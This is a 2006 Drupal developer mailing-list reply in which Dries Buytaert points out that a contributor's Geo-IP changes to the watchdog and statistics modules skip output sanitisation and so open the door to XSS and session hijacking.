[development] Geo-IP Modifications to 'watchdog' and 'statistics'
modules
Dries Buytaert
dries.buytaert at gmail.com
Tue Apr 18 17:25:43 UTC 2006
>> The screenshots look nice but the code looks a little dangerous as
>> you're not
>> validating the input. Hackers can inject XSS attacks.
>
> I'm not sure who the hackers would be, since this is on the admin
> side of
> things, and my script only operates on the hostname that is already
> in the
> SQL db.
If the server you 'curl' sends back malicious Javascript, they could
hijack your session and take over your website.
> Yeah. This script, in the admin pages, only acts on whatever data
> is in the
> watchdog 'hostname' field, which is an IP address placed there by
> other
> parts of Drupal (as you know. ;)
MySQL tables in Drupal contain insecure data, including the watchdog
and statistics tables. Drupal cleans up the data "on output" (just
before sending the data to the client). Your code does not clean up
the data, whereas the original code did.
--
Dries Buytaert :: http://www.buytaert.net/
More information about the development
mailing list